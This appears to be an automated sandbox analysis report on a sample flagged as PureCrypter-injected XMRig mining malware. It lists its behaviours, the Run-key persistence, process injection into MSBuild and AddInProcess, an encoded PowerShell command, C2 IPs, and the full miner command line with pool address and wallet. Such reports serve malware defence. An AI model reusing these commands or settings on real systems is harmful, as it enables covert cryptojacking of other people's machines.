Analysis Overview
SHA256
14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb
Threat Level: Known bad
The file tmp was found to be: Known bad.
Malicious Activity Summary
Detect PureCrypter injector
xmrig
PureCrypter
XMRig Miner payload
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-07 06:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-07 06:43
Reported
2023-02-07 06:46
Platform
win7-20220901-en
Max time kernel
45s
Max time network
49s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\cloudapp = "\"C:\\Users\\Admin\\AppData\\Local\\WinSCP\\cloudapp.exe\"" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 163.123.142.210:80 | 163.123.142.210 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-07 06:43
Reported
2023-02-07 06:46
Platform
win10v2004-20220812-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cloudapp = "\"C:\\Users\\Admin\\AppData\\Local\\WinSCP\\cloudapp.exe\"" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2220 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\tmp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe |
| PID 1360 set thread context of 4132 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.17.0.19:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Network
| Country | Destination | Domain | Proto |
| US | 163.123.142.210:80 | 163.123.142.210 | tcp |
| NL | 52.178.17.3:443 | N/A | tcp |
| IT | 179.43.155.202:9090 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.17.0.19:8080 | N/A | tcp |
| NL | 178.79.208.1:80 | N/A | tcp |
| NL | 178.79.208.1:80 | N/A | tcp |
Files